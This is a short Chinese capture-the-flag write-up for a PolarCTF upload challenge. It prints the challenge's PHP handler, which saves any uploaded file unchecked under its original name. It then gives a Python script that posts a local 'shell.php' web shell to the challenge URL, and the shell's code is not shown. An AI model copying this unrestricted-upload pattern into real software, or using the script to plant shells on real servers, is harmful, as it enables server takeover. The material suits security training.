uploader(py上传)
题目:
<?php
$sandBox = md5($_SERVER['REMOTE_ADDR']);
if(!is_dir($sandBox)){
mkdir($sandBox,0755,true);
}
if($_FILES){
move_uploaded_file($_FILES['file']['tmp_name'],$sandBox."/".$_FILES["file"]["name"]);
echo "上传文件名: " . $_FILES["file"]["name"] . "<br>";
echo "文件类型: " . $_FILES["file"]["type"] . "<br>";
echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
echo $sandBox;
}
highlight_file(__FILE__);
script:
import requests
url = "http://1bfc6405-6062-48fd-aea8-96b1ed57bb81.www.polarctf.com:8090/index.php"
f = open(r"D:\lethe\木马\shell.php", "rb").read()
files = {"file": ("shell.php", f)}
r = requests.post(url=url, files=files)
print(r.text)